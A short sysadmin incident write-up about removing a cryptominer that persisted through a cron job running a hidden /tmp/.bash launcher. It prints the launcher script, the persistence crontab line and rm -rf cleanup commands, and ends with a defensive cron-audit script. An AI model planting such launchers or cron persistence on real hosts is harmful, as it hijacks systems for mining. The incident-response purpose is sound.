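Server CPU usage was at 100%, and the process using it was named bash. Several virtual machines that shared the same password were all hit.
I looked into it: they were being used for cryptocurrency mining. Ugh.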
[root@localhost ~]# cat /tmp/.bash/bash
#!/bin/bash
cd -- /tmp/.bash
mkdir -- .bash
cp -f -- x86_64 .bash/bash
./.bash/bash -c
rm -rf .bash
I found that this script was being executed over and over.
From root@localhost.localdomain Sun Nov 15 21:32:02 2020
Return-Path: <root@localhost.localdomain>
X-Original-To: root
Delivered-To: root@localhost.localdomain
Received: by localhost.localdomain (Postfix, from userid 0)
    id 86AB4404DBE9; Sun, 15 Nov 2020 21:32:02 +0800 (CST)
From: "(Cron Daemon)" <root@localhost.localdomain>
To: root@localhost.localdomain
Subject: Cron <root@localhost> /tmp/.bash/bash
Content-Type: text/plain; charset=UTF-8
Auto-Submitted: auto-generated
Precedence: bulk
X-Cron-Env: <XDG_SESSION_ID=1498>
X-Cron-Env: <XDG_RUNTIME_DIR=/run/user/0>
X-Cron-Env: <LANG=zh_CN.UTF-8>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=root>
X-Cron-Env: <USER=root>
Message-Id: <20201115133202.86AB4404DBE9@localhost.localdomain>
Date: Sun, 15 Nov 2020 21:32:02 +0800 (CST)

|| ERROR || already running...
After deleting the /tmp/.bash folder, I found the emails were still being sent.
ls /tmp/.bash/
bash i686 x86_64
rm -rf /tmp/.bash
Check the scheduled tasks (crontab):
[root@localhost ~]# crontab -l
* * * * * /tmp/.bash/bash
[root@localhost ~]# crontab -e
* * * * * /tmp/.bash/bash ## delete this line
Get rid of it first.
Delete the following files:
rm -rf /tmp/.xm/stak/ld-linux-x86-64.so.2
rm -rf /sbin/upd
rm -rf /sbin/initct1
rm -rf /sbin/mke3fs
rm -rf /sbin/s1n
rm -rf /sbin/ld-linux-x86-64.so.2
rm -rf /sbin/libpthread.so.1
Change the password, and preferably change the SSH port as well.
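The persistence here was a cron entry running a binary out of a hidden directory under /tmp, so the same check can be run on the other machines that shared the password. The script below is an added example, not part of the original post: the function name `suspicious_cron_entries`, the directory list and the sample crontab are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: flag cron entries whose command references a world-writable
# directory (/tmp, /var/tmp, /dev/shm) or a hidden directory, the pattern of
# the "* * * * * /tmp/.bash/bash" job found above.

# Reads crontab-format text on stdin and prints each suspicious entry with a reason.
suspicious_cron_entries() {
    awk '
        /^[ \t]*(#|$)/ { next }                          # comments and blank lines
        /^[ \t]*[A-Za-z_][A-Za-z0-9_]*[ \t]*=/ { next }  # VAR=value lines (MAILTO, PATH)
        {
            # Command starts at field 6, or field 2 for @reboot-style entries.
            # In /etc/crontab and /etc/cron.d the user name is included; harmless here.
            start = ($1 ~ /^@/) ? 2 : 6
            cmd = ""
            for (i = start; i <= NF; i++) cmd = cmd (i > start ? " " : "") $i
            reason = ""
            # Path must begin at /tmp etc., so /usr/tmp or /home/a/tmp do not match.
            if (cmd ~ "(^|[^A-Za-z0-9_./-])/(tmp|var/tmp|dev/shm)/")
                reason = "world-writable dir"
            else if (cmd ~ "/\\.[^./ ][^/ ]*/")          # a /.name/ component
                reason = "hidden dir"
            if (reason != "") print reason ": " $0
        }
    '
}

# Constructed sample crontab (not captured from a real host).
SAMPLE_CRONTAB='# constructed sample
MAILTO=root
* * * * * /tmp/.bash/bash
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
@reboot /home/app/.cache/run.sh
*/5 * * * * /usr/local/bin/backup.sh /var/backups'

printf '%s\n' "$SAMPLE_CRONTAB" | suspicious_cron_entries

# On a live host, as root, check every account and the system cron files:
#   for u in $(cut -d: -f1 /etc/passwd); do
#       crontab -l -u "$u" 2>/dev/null | suspicious_cron_entries
#   done
#   cat /etc/crontab /etc/cron.d/* 2>/dev/null | suspicious_cron_entries
```

A hit on a hidden directory is only a prompt for review, since legitimate jobs sometimes live under paths such as ~/.cache.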